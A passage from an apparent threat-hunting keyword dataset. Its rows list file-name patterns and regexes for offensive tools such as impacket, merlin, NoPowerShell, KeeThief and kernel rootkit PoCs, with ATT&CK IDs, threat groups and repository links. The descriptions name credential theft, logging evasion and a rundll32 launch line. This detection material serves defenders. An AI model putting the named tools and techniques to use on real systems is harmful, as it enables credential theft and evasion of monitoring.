An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15562" "*\GetFullPrivs\GetFullPrivs*",".{0,1000}\\GetFullPrivs\\GetFullPrivs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15563" "*\GetFullPrivsDrv.cpp*",".{0,1000}\\GetFullPrivsDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15564" "*\GetFullPrivsDrv.exe*",".{0,1000}\\GetFullPrivsDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15565" "*\Get-FunctionHash.ps1*",".{0,1000}\\Get\-FunctionHash\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - 
T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15566" "*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15567" "*\Get-GPPPassword.ps1*",".{0,1000}\\Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15568" "*\Get-GPPPassword.py*",".{0,1000}\\Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15569" "*\GetHelpCommand.cs",".{0,1000}\\GetHelpCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15570" "*\GetHotFixCommand.cs",".{0,1000}\\GetHotFixCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15571" "*\Get-InfectedThread.ps1*",".{0,1000}\\Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15572" "*\Get-InjectedThread.ps1*",".{0,1000}\\Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15573" "*\GetItemPropertyCommand.cs",".{0,1000}\\GetItemPropertyCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15574" "*\GetItemPropertyValueCommand.cs",".{0,1000}\\GetItemPropertyValueCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15575" "*\GetLAPSPassword.py*",".{0,1000}\\GetLAPSPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15576" "*\GetLocalGroupCommand.cs",".{0,1000}\\GetLocalGroupCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15577" "*\GetLocalGroupMemberCommand.cs",".{0,1000}\\GetLocalGroupMemberCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15578" "*\GetLocalUserCommand.cs",".{0,1000}\\GetLocalUserCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15579" "*\getlsasrvaddr.exe*",".{0,1000}\\getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","15580" "*\GetMoney.exe*",".{0,1000}\\GetMoney\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15581" "*\GetNetIPAddressCommand.cs",".{0,1000}\\GetNetIPAddressCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15582" "*\GetNetNeighborCommand.cs",".{0,1000}\\GetNetNeighborCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15583" "*\Get-NetNTLM.ps1*",".{0,1000}\\Get\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","15584" "*\GetNetRouteCommand.cs",".{0,1000}\\GetNetRouteCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15585" "*\GetNetTCPConnectionCommand.cs",".{0,1000}\\GetNetTCPConnectionCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15586" "*\GetNPUsers.exe*",".{0,1000}\\GetNPUsers\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15587" "*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15588" "*\GetNPUsers.py*",".{0,1000}\\GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15589" "*\getOSandSMBproperties.exe*",".{0,1000}\\getOSandSMBproperties\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15590" "*\Get-OSTokenInformation.ps1*",".{0,1000}\\Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15591" "*\getPac.exe*",".{0,1000}\\getPac\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15592" "*\getPac.py*",".{0,1000}\\getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15593" "*\Get-PassHints.ps1*",".{0,1000}\\Get\-PassHints\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15594" "*\GetPasswords.ps1*",".{0,1000}\\GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15595" "*\Get-PEHeader.ps1*",".{0,1000}\\Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","15596" "*\GetProcessCommand.cs",".{0,1000}\\GetProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15597" "*\GetProcHandleDrv_x64.sys*",".{0,1000}\\GetProcHandleDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","15598" "*\GetPSDriveCommand.cs",".{0,1000}\\GetPSDriveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15599" "*\GetRemoteSmbShareCommand.cs",".{0,1000}\\GetRemoteSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15600" "*\Get-ScheduledTaskComHandler.ps1*",".{0,1000}\\Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15601" "*\GetSmbMappingCommand.cs",".{0,1000}\\GetSmbMappingCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15602" "*\GetSmbShareCommand.cs",".{0,1000}\\GetSmbShareCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15603" "*\Get-SMBSigning.ps1*",".{0,1000}\\Get\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","15604" "*\Get-SpoolStatus.ps1*",".{0,1000}\\Get\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential 
